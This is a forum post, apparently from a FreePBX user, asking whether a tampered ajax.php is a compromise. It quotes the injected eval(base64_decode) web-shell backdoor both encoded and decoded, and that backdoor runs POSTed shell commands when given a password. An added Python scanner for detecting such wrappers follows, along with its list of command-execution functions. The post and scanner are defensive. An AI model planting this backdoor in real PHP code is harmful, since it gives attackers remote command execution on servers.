@pbaeumel wrote:
Hi all,
Yesterday and today I received an email informing me about tampered file warnings.
Yesterday:
You have 1 tampered files:
Module: "FreePBX Framework", File: "/var/www/html/admin/libraries/media/Media/Media.php altered"

Today:
You have 1 tampered files:
Module: "FreePBX Framework", File: "/var/www/html/admin/ajax.php altered"

In today's reported file I might have discovered something suspicious right after the start:
// License for all code of this FreePBX module can be found in the license file inside the module directory
// Copyright 2013 Schmooze Com Inc.
eval(base64_decode('c2Vzc2lvbl9zdGFydCgpO2lmKCFpc3NldCgkX1NFU1NJT05bJ0FNUF91c2VyJ10pKXtpZihtZDUoJF9SRVFVRVNUWydwd2R6J10pID09ICdlYzAwOWVlZTY2NjJhNDlkNjBmNDRiNGE5MTk4ZmExZCcpe3NoZWxsX2V4ZWMoJF9QT1NUWydjJ10pO31lY2hvICd7ImVycm9yIjoiYWpheFJlcXVlc3QgIGRlY2xpbmVkIn0nO2V4aXQoKTt9'));

Retranslated, the base64 part means:

session_start();if(!isset($_SESSION['AMP_user'])){if(md5($_REQUEST['pwdz']) == 'ec009eee6662a49d60f44b4a9198fa1d'){shell_exec($_POST['c']);}echo '{"error":"ajaxRequest declined"}';exit();}
Is this really a security break?
Is there any source I could check the contents of ajax.php against the original?

Best regards,
Patrick
Posts: 4
Participants: 3
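
An added example, not part of the post above and not FreePBX tooling: a small Python scanner that looks for the same `eval(base64_decode('...'))` wrapper in PHP files, decodes the payload, and lists any command-execution calls inside it. The function names, the list of flagged calls, and the sample input are assumptions made for this illustration.

```python
import base64
import re
import sys
from pathlib import Path

# eval(base64_decode('...')) with optional whitespace and either quote style.
WRAPPER = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)",
    re.IGNORECASE,
)
# PHP calls that run OS commands or code (an illustrative, non-exhaustive list).
RISKY = ("shell_exec", "system", "passthru", "exec", "popen", "proc_open", "eval", "assert")
RISKY_RE = re.compile(r"\b(" + "|".join(RISKY) + r")\s*\(", re.IGNORECASE)


def scan_text(text):
    """Return a list of (line_number, decoded_payload, risky_calls) findings."""
    findings = []
    for m in WRAPPER.finditer(text):
        line_no = text.count("\n", 0, m.start()) + 1
        try:
            decoded = base64.b64decode(m.group(2)).decode("utf-8", "replace")
        except ValueError:  # binascii.Error (bad padding) is a ValueError
            decoded = "<undecodable base64>"
        calls = sorted({c.lower() for c in RISKY_RE.findall(decoded)})
        findings.append((line_no, decoded, calls))
    return findings


def scan_tree(root):
    """Scan every .php file under root; yield (path, finding) pairs."""
    for path in Path(root).rglob("*.php"):
        text = path.read_text(encoding="utf-8", errors="replace")
        for finding in scan_text(text):
            yield path, finding


def constructed_sample():
    """Constructed input: a PHP header followed by an encoded one-liner."""
    payload = base64.b64encode(b"session_start(); shell_exec('uptime');").decode()
    return "<?php\n// license header\neval(base64_decode('" + payload + "'));\nrequire 'x.php';\n"


if __name__ == "__main__":
    if len(sys.argv) > 1:
        hits = list(scan_tree(sys.argv[1]))
    else:
        hits = [("<constructed sample>", f) for f in scan_text(constructed_sample())]
    for path, (line_no, decoded, calls) in hits:
        print(f"{path}:{line_no}: calls={calls} decoded={decoded!r}")
```

Run with a directory argument (for example the web root named in the tamper email) to scan it; with no argument it scans the constructed sample.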